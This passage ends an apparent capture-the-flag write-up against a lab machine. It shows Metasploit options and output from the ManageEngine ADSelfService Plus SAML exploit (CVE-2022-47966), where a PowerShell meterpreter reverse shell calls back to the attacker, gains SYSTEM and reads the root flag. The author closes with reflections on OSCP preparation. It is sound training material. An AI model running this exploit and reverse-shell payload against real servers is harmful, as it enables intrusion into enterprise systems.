VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.76 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966) > exploit
[*] Started reverse TCP handler on 10.10.14.76:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (175686 bytes) to 10.129.229.4
[*] Meterpreter session 2 opened (10.10.14.76:4444 -> 10.129.229.4:51935) at 2023-05-01 11:52:38 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM <---- :)
meterpreter > pwd
C:\Program Files (x86)\ManageEngine\ADSelfService Plus\bin
meterpreter > cd C:/Users/Administrator/Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2023-03-06 10:00:00 -0500 desktop.ini
100444/r--r--r-- 34 fil 2023-05-01 06:50:45 -0400 root.txt
meterpreter > cat root.txt
9473401241e600a4295dda7301d245a9
meterpreter >
Note: tried calling MSF's "shell" here to get a proper system shell, but for some reason it was just hanging indefinitely - couldn't find a quick answer other than updating the MSF version so, meh.
Overall, a really fun box and a great opportunity to practice pivoting while keeping the exploits themselves easy enough to work with - can't speak from experience, but tempted to call this one "real-world" rather than "CTF-like".
It wouldn't surprise me if this one ends up on the TJ Null list (though it would also scare me a little given how long it took me to get through it… don't fancy knocking five of these out inside of 24 hours for the OSCP 😱… getting better though… slowly.)